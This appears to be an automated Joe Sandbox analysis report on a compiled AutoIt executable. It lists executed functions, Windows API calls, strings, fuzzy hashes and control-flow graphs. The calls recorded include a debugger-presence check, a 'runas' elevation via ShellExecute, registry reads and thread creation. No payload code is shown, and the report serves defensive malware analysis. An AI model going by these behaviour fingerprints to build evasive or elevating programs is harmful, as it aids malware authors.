88369 40c877 88368->88369 88370 40bc70 52 API calls 88369->88370 88371 40c881 88370->88371 88372 40bc70 52 API calls 88371->88372 88373 40c88b 88372->88373 88374 40bc70 52 API calls 88373->88374 88375 40c8d1 88374->88375 88376 40bc70 52 API calls 88375->88376 88377 40c991 88376->88377 88400 40d2c0 52 API calls 88377->88400 88379 40c99b 88401 40d0d0 53 API calls 88379->88401 88381 40c9c1 88382 40bc70 52 API calls 88381->88382 88383 40c9cb 88382->88383 88402 40e310 53 API calls 88383->88402 88385 40ca28 88386 408f40 VariantClear 88385->88386 88387 40ca30 88386->88387 88388 408f40 VariantClear 88387->88388 88389 40ca38 GetStdHandle 88388->88389 88390 429630 88389->88390 88391 40ca87 88389->88391 88390->88391 88392 429639 88390->88392 88397 41130a 51 API calls 88391->88397 88403 4432c0 57 API calls 88392->88403 88394 429641 88404 44b6ab CreateThread 88394->88404 88396 42964f CloseHandle 88396->88391 88397->88362 88398->88365 88399->88367 88400->88379 88401->88381 88402->88385 88403->88394 88404->88396 88405 44b5cb 58 API calls 88404->88405 88406 425b6f 88411 40dc90 88406->88411 88410 425b7e 88412 40bc70 52 API calls 88411->88412 88413 40dd03 88412->88413 88419 40f210 88413->88419 88415 40dd96 88417 40ddb7 88415->88417 88422 40dc00 52 API calls 88415->88422 88418 41130a 51 API calls 88417->88418 88418->88410 88423 40f250 RegOpenKeyExW 88419->88423 88421 40f230 88421->88415 88422->88415 88424 425e17 88423->88424 88425 40f275 RegQueryValueExW 88423->88425 88424->88421 88426 40f2c3 RegCloseKey 88425->88426 88427 40f298 88425->88427 88426->88421 88428 40f2a9 RegCloseKey 88427->88428 88429 425e1d 88427->88429 88428->88421

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 004096A0 Relevance: 23.4, APIs: 14, Instructions: 2413COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3964851224-0
                                                                                                                                                                  • Opcode ID: 6bbbb51ae73f28d569a331e4c9625fcce867519793cc7df863c48ce62f3aa96b
                                                                                                                                                                  • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                                                                                                                  • Opcode Fuzzy Hash: 6bbbb51ae73f28d569a331e4c9625fcce867519793cc7df863c48ce62f3aa96b
                                                                                                                                                                  • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                                                                                                                                  Function 0040D590 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144windowCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                                                                                                                    • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                                                                                                                  • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                                                                                                                    • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                                                                                                                  • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                                                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                                                                                                                    • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                                                                    • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                                                                    • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                                                                    • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                                                                    • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                                                                    • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                                                                    • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                                                                    • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                                                                                    • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                                                                                    • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                                                                                    • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                                                                                    • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                                                                                  Strings
                                                                                                                                                                  • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                                                                                                                                  • runas, xrefs: 0042E2AD, 0042E2DC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LoadWindow$IconName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_
                                                                                                                                                                  • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                                                  • API String ID: 3436406043-3383388033
                                                                                                                                                                  • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                                                                                                  • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                                                                                                                  • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                                                                                                  • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                                                                                                                                                  Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 2006 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 2015 40e582-40e583 2006->2015 2016 427674-427679 2006->2016 2019 40e585-40e596 2015->2019 2020 40e5ba-40e5cb call 40ef60 2015->2020 2017 427683-427686 2016->2017 2018 42767b-427681 2016->2018 2022 427693-427696 2017->2022 2023 427688-427691 2017->2023 2021 4276b4-4276be 2018->2021 2024 427625-427629 2019->2024 2025 40e59c-40e59f 2019->2025 2037 40e5ec-40e60c 2020->2037 2038 40e5cd-40e5e6 GetCurrentProcess call 40ef20 2020->2038 2039 4276c6-4276ca GetSystemInfo 2021->2039 2022->2021 2029 427698-4276a8 2022->2029 2023->2021 2031 427636-427640 2024->2031 2032 42762b-427631 2024->2032 2027 40e5a5-40e5ae 2025->2027 2028 427654-427657 2025->2028 2033 40e5b4 2027->2033 2034 427645-42764f 2027->2034 2028->2020 2040 42765d-42766f 2028->2040 2035 4276b0 2029->2035 2036 4276aa-4276ae 2029->2036 2031->2020 2032->2020 2033->2020 2034->2020 2035->2021 2036->2021 2041 40e612-40e623 call 40efd0 2037->2041 2042 4276d5-4276df GetSystemInfo 2037->2042 2038->2037 2050 40e5e8 2038->2050 2039->2042 2040->2020 2041->2039 2047 40e629-40e63f call 40ef90 GetNativeSystemInfo 2041->2047 2052 40e641-40e642 FreeLibrary 2047->2052 2053 40e644-40e651 2047->2053 2050->2037 2052->2053 2054 40e653-40e654 FreeLibrary 2053->2054 2055 40e656-40e65d 2053->2055 2054->2055
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                                                                                                                  • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion
                                                                                                                                                                  • String ID: 0SH
                                                                                                                                                                  • API String ID: 3079510601-851180471
                                                                                                                                                                  • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                                                                                  • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                                                                                                                  • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                                                                                  • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                                                                                                                  Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 2410 40ebd0-40ebd4 2411 40ebf6 2410->2411 2412 40ebd6-40ebe5 LoadLibraryA 2410->2412 2412->2411 2413 40ebe7-40ebf3 GetProcAddress 2412->2413 2413->2411
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                  • String ID: IsThemeActive$uxtheme.dll
                                                                                                                                                                  • API String ID: 2574300362-3542929980
                                                                                                                                                                  • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                                                                                  • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                                                                                                                  • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                                                                                  • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                                                                                                                  Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                                                                                                  • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 00409556
                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$Peek$DispatchSleepTranslate
                                                                                                                                                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                                                                                                  • API String ID: 1762048999-758534266
                                                                                                                                                                  • Opcode ID: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                                                                                                                                                                  • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                                                                                                  • Opcode Fuzzy Hash: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                                                                                                                                                                  • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                                                                                                                                                  Function 00422400 Relevance: 19.9, APIs: 9, Strings: 2, Instructions: 610fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNELBASE(00000000,00000000,?,0000000C,00000001,00000080,00000000,00000000,00000109,00000109), ref: 00422643
                                                                                                                                                                  • CreateFileW.KERNEL32(7FFFFFFF,7FFFFFFF,?,0000000C,00000001,00000001,00000000), ref: 0042267C
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004226A0
                                                                                                                                                                  • GetFileType.KERNELBASE(0040F7E9), ref: 004226BF
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004226E4
                                                                                                                                                                  • CloseHandle.KERNEL32(0040F7E9), ref: 004226F6
                                                                                                                                                                  • CloseHandle.KERNEL32(0040F7E9), ref: 00422AAD
                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,00000000,?,0000000C,00000003,00000001,00000000), ref: 00422ACD
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00422AD7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$CreateErrorLast$CloseHandle$Type
                                                                                                                                                                  • String ID: @$H
                                                                                                                                                                  • API String ID: 352418905-104103126
                                                                                                                                                                  • Opcode ID: a646307d57c18218cf2541d19adbe729ca7854e975d7805988412136e1a4be56
                                                                                                                                                                  • Instruction ID: a6762e264ba116d74e69880979fe52a2e70c3e31e27682f651d8d28631669406
                                                                                                                                                                  • Opcode Fuzzy Hash: a646307d57c18218cf2541d19adbe729ca7854e975d7805988412136e1a4be56
                                                                                                                                                                  • Instruction Fuzzy Hash: F7223331B04225BBDF219F64EA417AE7BB0EF41304FA4452BE450DB2A1D7FC8981CB59
                                                                                                                                                                  Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                                                                                  • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                                                                  • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                                                                  • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(009A0FF0,000000FF,00000000), ref: 00410552
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                  • API String ID: 2914291525-1005189915
                                                                                                                                                                  • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                                                                  • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                                                                                                                  • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                                                                  • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                                                                                                                                                  Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                                                                  • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                                                                  • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                                                                  • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                                                                  • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                                                                  • RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                                                                    • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                                                                                    • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                                                                    • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                                                                    • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                                                                    • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                                                                    • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                                                                    • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(009A0FF0,000000FF,00000000), ref: 00410552
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                  • String ID: #$0$AutoIt v3
                                                                                                                                                                  • API String ID: 423443420-4155596026
                                                                                                                                                                  • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                                                                  • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                                                                                                                  • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                                                                  • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                                                                                                                  Function 0040A780 Relevance: 14.9, APIs: 7, Strings: 1, Instructions: 881COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Default
                                                                                                                                                                  • API String ID: 0-753088835
